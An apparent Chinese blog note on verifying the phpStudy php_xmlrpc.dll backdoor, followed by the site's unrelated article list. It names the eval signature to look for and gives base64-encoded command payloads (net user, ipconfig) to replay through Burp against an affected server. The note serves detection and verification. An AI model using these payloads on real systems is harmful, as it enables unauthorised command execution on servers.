影响版本

漏洞验证

查看目录下 php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll存在@eval(%s('%s'));即说明有后门。

burp抓包 ctrl+R 重发

c3lzdGVtKCduZXQgdXNlcicpOw==为system('net user');的base64编码转换

可以通过转码查看

c3lzdGVtKCdpcGNvbmZpZycpOw==   system(ipconfig);

最新文章

  1. 关于xamarin.forms在MVVM情况下如何DisplayActionSheet
  2. jQuery的13个优点
  3. SQL having 子句
  4. Codeforces Round #208 (Div. 2) B Dima and Text Messages
  5. Java基础毕向东day02
  6. MySQL 查看表结构简单命令。
  7. Hibernate之Session对象的相关方法以及持久化对象的状态
  8. SGU223 - Little Kings(状态压缩DP)
  9. STL——迭代器的概念
  10. 读<<如何阅读一本书>>乱七八糟的笔记1
  11. Socket 基础解析使用ServerSocket建立聊天服务器
  12. Codeforces 461B - Appleman and Tree 树状DP
  13. 关于Cocos2dx之JS创建项目
  14. CSS 弹性盒子布局
  15. C语言之循环次数
  16. 基础--Redis在Linux环境下的安装
  17. Webpack 4教程 - 第四部分,使用SplitChunksPlugin分离代码
  18. 遇到一个很古怪的问题,C++类static const成员的初始化
  19. python从sqlite中提取数据到excel
  20. windows下安装pytorch

热门文章

  1. python 登陆三次错误退出
  2. VIM 批量注释的两种方法 (转)
  3. ansible用authorized_key模块批量推送密钥到受控主机(免密登录)(ansible2.9.5)
  4. Windows(WSL2) Linux子系统搭建Docker环境
  5. Drone 安装教程
  6. 【Azure Redis 缓存 Azure Cache For Redis】如何设置让Azure Redis中的RDB文件暂留更久(如7天)
  7. 设备屏幕与Size Class对应
  8. 10 张图打开 CPU 缓存一致性的大门
  9. Redis学习笔记(八)——持久化
  10. 谈谈nginx和lvs各自的优缺点以及使用